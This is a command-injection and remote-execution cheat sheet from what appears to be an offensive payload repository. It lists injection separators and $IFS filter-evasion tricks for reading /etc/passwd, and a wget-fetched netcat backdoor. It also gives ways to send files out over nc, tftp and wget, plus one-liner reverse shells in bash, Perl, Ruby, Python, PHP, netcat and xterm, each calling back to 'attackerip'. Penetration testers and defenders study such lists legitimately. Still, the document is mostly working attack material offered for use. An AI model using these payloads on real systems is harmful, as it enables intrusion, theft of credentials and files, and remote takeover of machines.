.. | ||
docs | ||
command-execution-unix.txt | ||
command-injection-template.txt | ||
Commands-Linux.txt | ||
Commands-OSX.txt | ||
Commands-Windows.txt | ||
Commands-WindowsPowershell.txt | ||
OSCommandInject.Windows.txt | ||
README.md | ||
shell-delimiters.txt | ||
shell-operators.txt | ||
source-disc-cmd-exec-traversal.txt | ||
useful-commands-unix.txt | ||
useful-commands-windows.txt |
Remote Command Exec Cheatsheet
Executing Commands
Various ways of separating Commands:
blah;blah2
blah ^ blah 2
blah && blah2
FAIL || X
blah%0Dblah2%0Dblah3
`blah`
`blah & blah2`
Shell commands without spaces
Using Internal Field Separator (IFS):
Test for cmd injection without spaces:
sleep${IFS:0:1}20
Example IFS netcat backdoor without spaces:
{wget,http://attackerip/nc}
{chmod,+x,./nc}
{./nc,-l,-p,1234,-e,/bin/bash}
$IFS shell variable:
cat$IFS/etc/passwd
increment the first +1 to retreive the entire file, line by line
cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1
Shell Variables:
CMD=$'cat\x20/etc/passwd';$CMD
shell variable, increment through file one line at a time:
increment the first +1 to retreive the entire file, line by line
SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1
Exfiltrating Files / Data
FTP
Make a new text file, and echo and then redirect to FTP
NC
'nc -e /bin/sh'
NC
'echo /etc/passwd | nc host port'
TFTP
'echo put /etc/passwd | tftp host'
WGET:
'wget --post-file /etc/passwd'
One-Liner Reverse Shells
On the listener
$ nc -l -p 1234 -vvv'
On the remote host...
Bash:
$ bash -i >& /dev/tcp/attackerip/1234 0>&1
$ exec 5<>/dev/tcp/attackerip/1234
$ cat <&5 | while read line; do $line 2>&5 >&5; done
Perl
$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl for Windows target
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby
$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. It it doesn't work, try 4,5, or 6)
Netcat
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f
Bash
bash -i >& /dev/tcp/attackerip/1234 0>&1
XTERM
To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest:
Xnest :1
Authorize the target IP's connection to you:
Run this OUTSIDE the Xnest:
xterm -display 127.0.0.1:1
Run this INSIDE the spawned xterm on the open X Server
xhost +targetip
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
or
DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.
If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:
/usr/openwin/bin/xterm -display attackerip:1
More docs: /docs/attack-docs/remote-cmd-exfiltration/